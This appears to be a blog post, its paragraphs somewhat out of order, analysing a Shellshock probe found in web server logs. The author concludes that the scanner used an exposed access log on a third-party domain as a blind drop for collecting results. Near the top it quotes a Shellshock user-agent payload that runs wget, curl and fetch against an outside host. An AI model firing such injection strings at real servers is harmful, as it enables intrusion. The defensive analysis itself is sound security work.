24.71.248.218 - - [28/Apr/2016:16:55:30 -0500] "GET / HTTP/1.1" 403 4961 "-" "() { :; }; /bin/sh -c 'wget http://closettransfer.com/IPTRANSITTEST -O /dev/null;wget1 http://closettransfer.com/IPTRANSITTEST -O /dev/null;curl http://closettransfer.com/IPTRANSITTEST -o /dev/null;/usr/sfwbin/wget http://closettransfer.com/IPTRANSITTEST;fetch -/dev/null http://closettransfer.com/IPTRANSITTEST'"

--2016-04-30 13:38:26-- http://closettransfer.com/IPTRANSITTEST

Resolving closettransfer.com (closettransfer.com)... 98.138.19.143

Connecting to closettransfer.com (closettransfer.com)|98.138.19.143|:80... connected.

HTTP request sent, awaiting response...

404 Not Found

2016-04-30 13:38:26 ERROR 404: Not Found.





They weren't sending a malicious payload - and the scanning had sent the results to /dev/null anyway. Googling IPTRANSITTEST turned up a few hits in other people's logfiles... wait a second. Logfiles. What if closettransfer.com had left its logfiles visible in some way, and an attacker was using this as a blind drop to find the results of their scanning without needing to collect any data back from the scanning nodes?





My first guess proved startlingly lucky:

Looking at the contents of one access log, quite a few IP addresses have downloaded the logfiles themselves, so I didn't dig further.





It's pretty clear, though, what happened: These logfiles are easily found via a bit of "Google-scanning":

Having located an accessible drop-box to collect the results, someone recruited a set of nodes to scan lots of websites with a custom user-agent. By using the drop-box, these nodes never need to contact the controller / response collector: they're completely fire-and-forget, and thus, could be distributed as malware or in a host of other ways. At some point, the controller wants to get the entries. He/she then can just download the raw access files using Tor, finding all sorts of juicy entries like:





XXX.XXX.XXX.XXX [30/Apr/2016:09:25:12 -0700] "GET /IPTRANSITTEST HTTP/1.1" 404 73 "-" "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.19.1 Basic ECC zlib/1.2.3 libidn/1.18 libssh2/1.4.2" "closettransfer.com"

Clever.

One of my friends noted that he'd spotted a shellshock-style user-agent string in his web log files, looking like:Curious about whether it was a legitimate domain (perhaps owned), I googled the domain name:Seasonally-appropriate designer labels. Doesn't really seem like the kind of thing a white-hat security scanner would be pretending to be. Was the domain compromised and I should try to notify them? Hmm. What the heck - try to download the page: